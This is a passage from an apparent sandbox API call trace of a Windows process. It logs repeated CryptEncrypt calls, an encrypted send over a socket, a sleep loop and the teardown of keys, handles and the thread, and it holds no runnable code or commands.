hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3f68b9c*, pdwDataLen=0x316f41c*=0x10, dwBufLen=0x10 | out: pbData=0x3f68b9c*, pdwDataLen=0x316f41c*=0x10) returned 1 [0191.022] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3f68b9c*, pdwDataLen=0x316f41c*=0x10, dwBufLen=0x10 | out: pbData=0x3f68b9c*, pdwDataLen=0x316f41c*=0x10) returned 1 [0191.023] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3f68b9c*, pdwDataLen=0x316f41c*=0x10, dwBufLen=0x10 | out: pbData=0x3f68b9c*, pdwDataLen=0x316f41c*=0x10) returned 1 [0191.023] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3f68b9c*, pdwDataLen=0x316f41c*=0x10, dwBufLen=0x10 | out: pbData=0x3f68b9c*, pdwDataLen=0x316f41c*=0x10) returned 1 [0191.023] malloc (_Size=0x1fd) returned 0x3691680 [0191.023] free (_Block=0x0) [0191.023] free (_Block=0x0) [0191.023] free (_Block=0x3691478) [0191.023] free (_Block=0x3691270) [0191.023] malloc (_Size=0x1fd) returned 0x3691270 [0191.023] free (_Block=0x0) [0191.023] malloc (_Size=0x1fd) returned 0x3691478 [0191.023] free (_Block=0x0) [0191.023] CryptEncrypt (in: hKey=0x3e0c58, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60608c*, pdwDataLen=0x316f41c*=0x10, dwBufLen=0x10 | out: pbData=0x60608c*, pdwDataLen=0x316f41c*=0x10) returned 1 [0191.023] CryptEncrypt (in: hKey=0x3e0c58, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60608c*, pdwDataLen=0x316f41c*=0x10, dwBufLen=0x10 | out: pbData=0x60608c*, pdwDataLen=0x316f41c*=0x10) returned 1 [0191.023] CryptEncrypt (in: hKey=0x3e0c58, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60608c*, pdwDataLen=0x316f41c*=0x10, dwBufLen=0x10 | out: pbData=0x60608c*, pdwDataLen=0x316f41c*=0x10) returned 1 [0191.023] CryptEncrypt (in: hKey=0x3e0c58, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60608c*, pdwDataLen=0x316f41c*=0x10, dwBufLen=0x10 | out: pbData=0x60608c*, pdwDataLen=0x316f41c*=0x10) returned 1 [0191.024] CryptEncrypt (in: hKey=0x3e0c58, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60608c*, pdwDataLen=0x316f41c*=0x10, dwBufLen=0x10 | out: pbData=0x60608c*, pdwDataLen=0x316f41c*=0x10) returned 1 [0191.024] CryptEncrypt (in: hKey=0x3e0c58, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60608c*, pdwDataLen=0x316f41c*=0x10, dwBufLen=0x10 | out: pbData=0x60608c*, pdwDataLen=0x316f41c*=0x10) returned 1 [0191.024] CryptEncrypt (in: hKey=0x3e0c58, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60608c*, pdwDataLen=0x316f41c*=0x10, dwBufLen=0x10 | out: pbData=0x60608c*, pdwDataLen=0x316f41c*=0x10) returned 1 [0191.024] CryptEncrypt (in: hKey=0x3e0c58, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60608c*, pdwDataLen=0x316f41c*=0x10, dwBufLen=0x10 | out: pbData=0x60608c*, pdwDataLen=0x316f41c*=0x10) returned 1 [0191.024] CryptEncrypt (in: hKey=0x3e0c58, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60608c*, pdwDataLen=0x316f41c*=0x10, dwBufLen=0x10 | out: pbData=0x60608c*, pdwDataLen=0x316f41c*=0x10) returned 1 [0191.024] CryptEncrypt (in: hKey=0x3e0c58, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60608c*, pdwDataLen=0x316f41c*=0x10, dwBufLen=0x10 | out: pbData=0x60608c*, pdwDataLen=0x316f41c*=0x10) returned 1 [0191.024] CryptEncrypt (in: hKey=0x3e0c58, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60608c*, pdwDataLen=0x316f41c*=0x10, dwBufLen=0x10 | out: pbData=0x60608c*, pdwDataLen=0x316f41c*=0x10) returned 1 [0191.024] CryptEncrypt (in: hKey=0x3e0c58, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60608c*, pdwDataLen=0x316f41c*=0x10, dwBufLen=0x10 | out: pbData=0x60608c*, pdwDataLen=0x316f41c*=0x10) returned 1 [0191.024] CryptEncrypt (in: hKey=0x3e0c58, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60608c*, pdwDataLen=0x316f41c*=0x10, dwBufLen=0x10 | out: pbData=0x60608c*, pdwDataLen=0x316f41c*=0x10) returned 1 [0191.024] CryptEncrypt (in: hKey=0x3e0c58, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60608c*, pdwDataLen=0x316f41c*=0x10, dwBufLen=0x10 | out: pbData=0x60608c*, pdwDataLen=0x316f41c*=0x10) returned 1 [0191.024] CryptEncrypt (in: hKey=0x3e0c58, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60608c*, pdwDataLen=0x316f41c*=0x10, dwBufLen=0x10 | out: pbData=0x60608c*, pdwDataLen=0x316f41c*=0x10) returned 1 [0191.024] CryptEncrypt (in: hKey=0x3e0c58, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60608c*, pdwDataLen=0x316f41c*=0x10, dwBufLen=0x10 | out: pbData=0x60608c*, pdwDataLen=0x316f41c*=0x10) returned 1 [0191.024] CryptEncrypt (in: hKey=0x3e0c58, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60608c*, pdwDataLen=0x316f41c*=0x10, dwBufLen=0x10 | out: pbData=0x60608c*, pdwDataLen=0x316f41c*=0x10) returned 1 [0191.024] CryptEncrypt (in: hKey=0x3e0c58, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60608c*, pdwDataLen=0x316f41c*=0x10, dwBufLen=0x10 | out: pbData=0x60608c*, pdwDataLen=0x316f41c*=0x10) returned 1 [0191.025] CryptEncrypt (in: hKey=0x3e0c58, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60608c*, pdwDataLen=0x316f41c*=0x10, dwBufLen=0x10 | out: pbData=0x60608c*, pdwDataLen=0x316f41c*=0x10) returned 1 [0191.025] CryptEncrypt (in: hKey=0x3e0c58, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60608c*, pdwDataLen=0x316f41c*=0x10, dwBufLen=0x10 | out: pbData=0x60608c*, pdwDataLen=0x316f41c*=0x10) returned 1 [0191.025] CryptEncrypt (in: hKey=0x3e0c58, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60608c*, pdwDataLen=0x316f41c*=0x10, dwBufLen=0x10 | out: pbData=0x60608c*, pdwDataLen=0x316f41c*=0x10) returned 1 [0191.025] CryptEncrypt (in: hKey=0x3e0c58, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60608c*, pdwDataLen=0x316f41c*=0x10, dwBufLen=0x10 | out: pbData=0x60608c*, pdwDataLen=0x316f41c*=0x10) returned 1 [0191.025] CryptEncrypt (in: hKey=0x3e0c58, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60608c*, pdwDataLen=0x316f41c*=0x10, dwBufLen=0x10 | out: pbData=0x60608c*, pdwDataLen=0x316f41c*=0x10) returned 1 [0191.025] CryptEncrypt (in: hKey=0x3e0c58, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60608c*, pdwDataLen=0x316f41c*=0x10, dwBufLen=0x10 | out: pbData=0x60608c*, pdwDataLen=0x316f41c*=0x10) returned 1 [0191.025] CryptEncrypt (in: hKey=0x3e0c58, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60608c*, pdwDataLen=0x316f41c*=0x10, dwBufLen=0x10 | out: pbData=0x60608c*, pdwDataLen=0x316f41c*=0x10) returned 1 [0191.025] CryptEncrypt (in: hKey=0x3e0c58, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60608c*, pdwDataLen=0x316f41c*=0x10, dwBufLen=0x10 | out: pbData=0x60608c*, pdwDataLen=0x316f41c*=0x10) returned 1 [0191.025] CryptEncrypt (in: hKey=0x3e0c58, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60608c*, pdwDataLen=0x316f41c*=0x10, dwBufLen=0x10 | out: pbData=0x60608c*, pdwDataLen=0x316f41c*=0x10) returned 1 [0191.025] CryptEncrypt (in: hKey=0x3e0c58, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60608c*, pdwDataLen=0x316f41c*=0x10, dwBufLen=0x10 | out: pbData=0x60608c*, pdwDataLen=0x316f41c*=0x10) returned 1 [0191.025] CryptEncrypt (in: hKey=0x3e0c58, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60608c*, pdwDataLen=0x316f41c*=0x10, dwBufLen=0x10 | out: pbData=0x60608c*, pdwDataLen=0x316f41c*=0x10) returned 1 [0191.025] CryptEncrypt (in: hKey=0x3e0c58, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60608c*, pdwDataLen=0x316f41c*=0x10, dwBufLen=0x10 | out: pbData=0x60608c*, pdwDataLen=0x316f41c*=0x10) returned 1 [0191.025] CryptEncrypt (in: hKey=0x3e0c58, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60608c*, pdwDataLen=0x316f41c*=0x10, dwBufLen=0x10 | out: pbData=0x60608c*, pdwDataLen=0x316f41c*=0x10) returned 1 [0191.025] CryptEncrypt (in: hKey=0x3e0c58, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60608c*, pdwDataLen=0x316f41c*=0x10, dwBufLen=0x10 | out: pbData=0x60608c*, pdwDataLen=0x316f41c*=0x10) returned 1 [0191.026] malloc (_Size=0x1fd) returned 0x60e6c0 [0191.026] free (_Block=0x0) [0191.026] free (_Block=0x3691680) [0191.026] free (_Block=0x3691478) [0191.026] free (_Block=0x3691270) [0191.026] malloc (_Size=0x1fd) returned 0x60e8c8 [0191.026] free (_Block=0x0) [0191.026] malloc (_Size=0x1fd) returned 0x60ead0 [0191.026] free (_Block=0x0) [0191.026] CryptEncrypt (in: hKey=0x3e10d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x316f41c*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x316f41c*=0x10) returned 1 [0191.026] CryptEncrypt (in: hKey=0x3e10d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x316f41c*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x316f41c*=0x10) returned 1 [0191.026] CryptEncrypt (in: hKey=0x3e10d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x316f41c*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x316f41c*=0x10) returned 1 [0191.026] CryptEncrypt (in: hKey=0x3e10d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x316f41c*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x316f41c*=0x10) returned 1 [0191.027] CryptEncrypt (in: hKey=0x3e10d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x316f41c*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x316f41c*=0x10) returned 1 [0191.027] CryptEncrypt (in: hKey=0x3e10d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x316f41c*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x316f41c*=0x10) returned 1 [0191.027] CryptEncrypt (in: hKey=0x3e10d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x316f41c*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x316f41c*=0x10) returned 1 [0191.027] CryptEncrypt (in: hKey=0x3e10d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x316f41c*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x316f41c*=0x10) returned 1 [0191.027] CryptEncrypt (in: hKey=0x3e10d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x316f41c*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x316f41c*=0x10) returned 1 [0191.027] CryptEncrypt (in: hKey=0x3e10d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x316f41c*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x316f41c*=0x10) returned 1 [0191.027] CryptEncrypt (in: hKey=0x3e10d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x316f41c*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x316f41c*=0x10) returned 1 [0191.027] CryptEncrypt (in: hKey=0x3e10d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x316f41c*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x316f41c*=0x10) returned 1 [0191.027] CryptEncrypt (in: hKey=0x3e10d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x316f41c*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x316f41c*=0x10) returned 1 [0191.027] CryptEncrypt (in: hKey=0x3e10d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x316f41c*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x316f41c*=0x10) returned 1 [0191.027] CryptEncrypt (in: hKey=0x3e10d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x316f41c*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x316f41c*=0x10) returned 1 [0191.028] CryptEncrypt (in: hKey=0x3e10d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x316f41c*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x316f41c*=0x10) returned 1 [0191.028] CryptEncrypt (in: hKey=0x3e10d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x316f41c*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x316f41c*=0x10) returned 1 [0191.028] CryptEncrypt (in: hKey=0x3e10d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x316f41c*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x316f41c*=0x10) returned 1 [0191.028] CryptEncrypt (in: hKey=0x3e10d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x316f41c*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x316f41c*=0x10) returned 1 [0191.028] CryptEncrypt (in: hKey=0x3e10d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x316f41c*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x316f41c*=0x10) returned 1 [0191.028] CryptEncrypt (in: hKey=0x3e10d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x316f41c*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x316f41c*=0x10) returned 1 [0191.028] CryptEncrypt (in: hKey=0x3e10d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x316f41c*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x316f41c*=0x10) returned 1 [0191.029] CryptEncrypt (in: hKey=0x3e10d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x316f41c*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x316f41c*=0x10) returned 1 [0191.029] CryptEncrypt (in: hKey=0x3e10d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x316f41c*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x316f41c*=0x10) returned 1 [0191.029] CryptEncrypt (in: hKey=0x3e10d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x316f41c*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x316f41c*=0x10) returned 1 [0191.029] CryptEncrypt (in: hKey=0x3e10d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x316f41c*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x316f41c*=0x10) returned 1 [0191.029] CryptEncrypt (in: hKey=0x3e10d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x316f41c*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x316f41c*=0x10) returned 1 [0191.029] CryptEncrypt (in: hKey=0x3e10d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x316f41c*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x316f41c*=0x10) returned 1 [0191.029] CryptEncrypt (in: hKey=0x3e10d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x316f41c*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x316f41c*=0x10) returned 1 [0191.029] CryptEncrypt (in: hKey=0x3e10d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x316f41c*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x316f41c*=0x10) returned 1 [0191.029] CryptEncrypt (in: hKey=0x3e10d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x316f41c*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x316f41c*=0x10) returned 1 [0191.029] CryptEncrypt (in: hKey=0x3e10d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x316f41c*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x316f41c*=0x10) returned 1 [0191.029] malloc (_Size=0x1fd) returned 0x3691270 [0191.029] free (_Block=0x0) [0191.029] free (_Block=0x60e6c0) [0191.029] free (_Block=0x60ead0) [0191.029] free (_Block=0x60e8c8) [0191.030] malloc (_Size=0x202) returned 0x3691478 [0191.030] free (_Block=0x0) [0191.030] EncryptMessage (in: phContext=0x3594d4c, fQOP=0x0, pMessage=0x316f454, MessageSeqNo=0x0 | out: pMessage=0x316f454) returned 0x0 [0191.030] send (s=0x5c8, buf=0x3de7008*, len=543, flags=0) returned 543 [0191.031] free (_Block=0x3691478) [0191.031] free (_Block=0x606108) [0191.031] free (_Block=0x3691270) [0191.031] Sleep (dwMilliseconds=0xa) [0191.044] Sleep (dwMilliseconds=0xa) [0191.060] Sleep (dwMilliseconds=0xa) [0191.075] Sleep (dwMilliseconds=0xa) [0191.090] Sleep (dwMilliseconds=0xa) [0191.107] Sleep (dwMilliseconds=0xa) [0191.124] Sleep (dwMilliseconds=0xa) [0191.137] Sleep (dwMilliseconds=0xa) [0191.153] Sleep (dwMilliseconds=0xa) [0191.168] Sleep (dwMilliseconds=0xa) [0191.184] Sleep (dwMilliseconds=0xa) [0191.200] Sleep (dwMilliseconds=0xa) [0191.216] Sleep (dwMilliseconds=0xa) [0191.231] Sleep (dwMilliseconds=0xa) [0191.247] Sleep (dwMilliseconds=0xa) [0191.262] Sleep (dwMilliseconds=0xa) [0191.278] Sleep (dwMilliseconds=0xa) [0191.293] Sleep (dwMilliseconds=0xa) [0191.309] Sleep (dwMilliseconds=0xa) [0191.325] Sleep (dwMilliseconds=0xa) [0191.340] Sleep (dwMilliseconds=0xa) [0191.359] Sleep (dwMilliseconds=0xa) [0191.372] Sleep (dwMilliseconds=0xa) [0191.387] Sleep (dwMilliseconds=0xa) [0191.403] Sleep (dwMilliseconds=0xa) [0191.661] Sleep (dwMilliseconds=0xa) [0191.731] Sleep (dwMilliseconds=0xa) [0191.780] Sleep (dwMilliseconds=0xa) [0191.827] Sleep (dwMilliseconds=0xa) [0191.874] Sleep (dwMilliseconds=0xa) [0191.964] Sleep (dwMilliseconds=0xa) [0192.043] Sleep (dwMilliseconds=0xa) [0192.106] Sleep (dwMilliseconds=0xa) [0192.184] Sleep (dwMilliseconds=0xa) [0192.295] Sleep (dwMilliseconds=0xa) [0192.453] Sleep (dwMilliseconds=0xa) [0192.516] Sleep (dwMilliseconds=0xa) [0192.681] Sleep (dwMilliseconds=0xa) [0192.743] Sleep (dwMilliseconds=0xa) [0192.821] Sleep (dwMilliseconds=0xa) [0192.927] Sleep (dwMilliseconds=0xa) [0192.991] Sleep (dwMilliseconds=0xa) [0193.049] Sleep (dwMilliseconds=0xa) [0193.105] Sleep (dwMilliseconds=0xa) [0193.148] Sleep (dwMilliseconds=0xa) [0193.196] Sleep (dwMilliseconds=0xa) [0193.245] Sleep (dwMilliseconds=0xa) [0193.318] Sleep (dwMilliseconds=0xa) [0193.373] Sleep (dwMilliseconds=0xa) [0193.482] Sleep (dwMilliseconds=0xa) [0193.524] Sleep (dwMilliseconds=0xa) [0193.572] Sleep (dwMilliseconds=0xa) [0193.740] Sleep (dwMilliseconds=0xa) [0193.788] Sleep (dwMilliseconds=0xa) [0193.835] Sleep (dwMilliseconds=0xa) [0193.892] Sleep (dwMilliseconds=0xa) [0193.937] Sleep (dwMilliseconds=0xa) [0193.976] Sleep (dwMilliseconds=0xa) [0194.119] Sleep (dwMilliseconds=0xa) [0194.235] Sleep (dwMilliseconds=0xa) [0194.283] Sleep (dwMilliseconds=0xa) [0194.322] Sleep (dwMilliseconds=0xa) [0194.366] Sleep (dwMilliseconds=0xa) [0194.505] Sleep (dwMilliseconds=0xa) [0194.599] Sleep (dwMilliseconds=0xa) [0194.791] Sleep (dwMilliseconds=0xa) [0194.880] Sleep (dwMilliseconds=0xa) [0194.970] Sleep (dwMilliseconds=0xa) [0195.052] Sleep (dwMilliseconds=0xa) [0195.146] Sleep (dwMilliseconds=0xa) [0195.211] Sleep (dwMilliseconds=0xa) [0195.264] Sleep (dwMilliseconds=0xa) [0195.304] Sleep (dwMilliseconds=0xa) [0195.357] Sleep (dwMilliseconds=0xa) [0195.402] Sleep (dwMilliseconds=0xa) [0195.475] Sleep (dwMilliseconds=0xa) [0195.521] Sleep (dwMilliseconds=0xa) [0195.568] Sleep (dwMilliseconds=0xa) [0195.638] Sleep (dwMilliseconds=0xa) [0195.680] Sleep (dwMilliseconds=0xa) [0195.866] Sleep (dwMilliseconds=0xa) [0195.919] Sleep (dwMilliseconds=0xa) [0195.961] Sleep (dwMilliseconds=0xa) [0196.026] Sleep (dwMilliseconds=0xa) [0196.087] Sleep (dwMilliseconds=0xa) [0196.152] Sleep (dwMilliseconds=0xa) [0196.195] Sleep (dwMilliseconds=0xa) [0196.243] Sleep (dwMilliseconds=0xa) [0196.291] Sleep (dwMilliseconds=0xa) [0196.334] Sleep (dwMilliseconds=0xa) [0196.381] Sleep (dwMilliseconds=0xa) [0196.602] Sleep (dwMilliseconds=0xa) [0196.674] Sleep (dwMilliseconds=0xa) [0196.709] Sleep (dwMilliseconds=0xa) [0196.755] Sleep (dwMilliseconds=0xa) [0196.802] Sleep (dwMilliseconds=0xa) [0196.896] Sleep (dwMilliseconds=0xa) [0196.960] free (_Block=0x3df0550) [0196.960] malloc (_Size=0xf6) returned 0x3df0550 [0196.960] free (_Block=0x0) [0196.960] Sleep (dwMilliseconds=0xa) [0197.009] Sleep (dwMilliseconds=0xa) [0197.067] Sleep (dwMilliseconds=0xa) [0197.118] Sleep (dwMilliseconds=0xa) [0197.169] Sleep (dwMilliseconds=0xa) [0197.212] Sleep (dwMilliseconds=0xa) [0197.259] Sleep (dwMilliseconds=0xa) [0197.303] free (_Block=0x0) [0197.304] malloc (_Size=0x14) returned 0x3f653c0 [0197.304] free (_Block=0x0) [0197.304] free (_Block=0x3df0550) [0197.304] free (_Block=0x3d81e60) [0197.304] free (_Block=0x0) [0197.304] SetEvent (hEvent=0x558) returned 1 [0197.304] ApplyControlToken (phContext=0x3594d4c, pInput=0x3594dac) returned 0x0 [0197.306] InitializeSecurityContextA (in: phCredential=0x3594d44, phContext=0x3594d4c, pszTargetName=0x3648e48, fContextReq=0xc11c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x0, Reserved2=0x0, phNewContext=0x3594d4c, pOutput=0x3594dac, pfContextAttr=0x3594dbc, ptsExpiry=0x0 | out: phNewContext=0x3594d4c, pOutput=0x3594dac, pfContextAttr=0x3594dbc, ptsExpiry=0x0) returned 0x0 [0197.308] send (s=0x5c8, buf=0x42b8e0*, len=31, flags=0) returned 31 [0197.308] FreeContextBuffer (in: pvContextBuffer=0x42b8e0 | out: pvContextBuffer=0x42b8e0) returned 0x0 [0197.308] closesocket (s=0x5c8) returned 0 [0197.311] ApplyControlToken (phContext=0x3594d4c, pInput=0x3594dac) returned 0x0 [0197.312] InitializeSecurityContextA (in: phCredential=0x3594d44, phContext=0x3594d4c, pszTargetName=0x3648e48, fContextReq=0xc11c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x0, Reserved2=0x0, phNewContext=0x3594d4c, pOutput=0x3594dac, pfContextAttr=0x3594dbc, ptsExpiry=0x0 | out: phNewContext=0x3594d4c, pOutput=0x3594dac, pfContextAttr=0x3594dbc, ptsExpiry=0x0) returned 0x0 [0197.312] send (s=0xffffffff, buf=0x42be58*, len=31, flags=0) returned -1 [0197.312] FreeContextBuffer (in: pvContextBuffer=0x42be58 | out: pvContextBuffer=0x42be58) returned 0x0 [0197.312] FreeCredentialsHandle (phCredential=0x3594d44) returned 0x0 [0197.312] DeleteSecurityContext (phContext=0x3594d4c) returned 0x0 [0197.313] free (_Block=0x3689268) [0197.313] free (_Block=0x3de7008) [0197.313] free (_Block=0x3648e48) [0197.313] closesocket (s=0xffffffff) returned -1 [0197.313] free (_Block=0x0) [0197.313] free (_Block=0x3594d18) [0197.313] WaitForSingleObject (hHandle=0x5cc, dwMilliseconds=0xffffffff) returned 0x0 [0197.313] TerminateThread (hThread=0x5cc, dwExitCode=0x0) returned 1 [0197.314] CloseHandle (hObject=0x5cc) returned 1 [0197.314] free (_Block=0x3d803a0) [0197.314] SetEvent (hEvent=0x558) returned 1 [0197.314] free (_Block=0x0) [0197.314] CryptDestroyKey (hKey=0x3e1058) returned 1 [0197.316] free (_Block=0x3624c18) [0197.316] CryptDestroyHash (hHash=0x3e0f58) returned 1 [0197.316] CryptDestroyHash (hHash=0x3e0ed8) returned 1 [0197.316] CryptDestroyKey (hKey=0x3e0e18) returned 1 [0197.316] CryptDestroyKey (hKey=0x3e10d8) returned 1 [0197.316] free (_Block=0x3594f20) [0197.316] free (_Block=0x36245f0) [0197.316] CryptDestroyKey (hKey=0x3e0b58) returned 1 [0197.318] free (_Block=0x3df00e0) [0197.318] CryptDestroyHash (hHash=0x3e0bd8) returned 1 [0197.318] CryptDestroyHash (hHash=0x3e0b98) returned 1 [0197.318] CryptDestroyKey (hKey=0x3e1998) returned 1 [0197.318] CryptDestroyKey (hKey=0x3e0c58) returned 1 [0197.318] free (_Block=0x606048) [0197.318] free (_Block=0x3624630) [0197.318] CryptDestroyKey (hKey=0x432938) returned 1 [0197.322] free (_Block=0x3f68818) [0197.322] CryptDestroyHash (hHash=0x432c78) returned 1 [0197.322] CryptDestroyHash (hHash=0x432d78) returned 1 [0197.322] CryptDestroyKey (hKey=0x4329b8) returned 1 [0197.322] CryptDestroyKey (hKey=0x4327b8) returned 1 [0197.322] free (_Block=0x3f68b58) [0197.323] free (_Block=0x3624670) [0197.323] SetEvent (hEvent=0x3a4) returned 1 [0197.323] SetEvent (hEvent=0x3a8) returned 1 [0197.323] free (_Block=0x3648ef0) [0197.323] free (_Block=0x3d80288) [0197.323] CloseHandle (hObject=0x3a8) returned 1 [0197.323] CloseHandle (hObject=0x3a4) returned 1 [0197.323] free (_Block=0x3d9ada8) [0197.323] free (_Block=0x0) [0197.323] CloseHandle (hObject=0x5b0) returned 1 [0197.323] CloseHandle (hObject=0x380) returned 1 [0197.323] free (_Block=0x0) [0197.323] free (_Block=0x3d66d30) [0197.323] free (_Block=0x0) [0197.324] free (_Block=0x3f4bfb8) [0197.324] free (_Block=0x3f651e0) [0197.324] free (_Block=0x3f65380) [0197.324] free (_Block=0x3f4c058) [0197.324] free (_Block=0x60dd08) [0197.324] free (_Block=0x0) [0197.324] free (_Block=0x3f653c0) [0197.324] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x3f6f08 | out: hHeap=0x3c0000) returned 1 [0197.325] GetLastError () returned 0x2736 [0197.325] SetLastError (dwErrCode=0x2736) [0197.325] CloseHandle (hObject=0x550) returned 1 [0197.325] FreeLibraryAndExitThread (hLibModule=0x320000, dwExitCode=0x0) [0197.325] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x438a98 | out: hHeap=0x3c0000) returned 1 [0197.325] HeapFree (in: 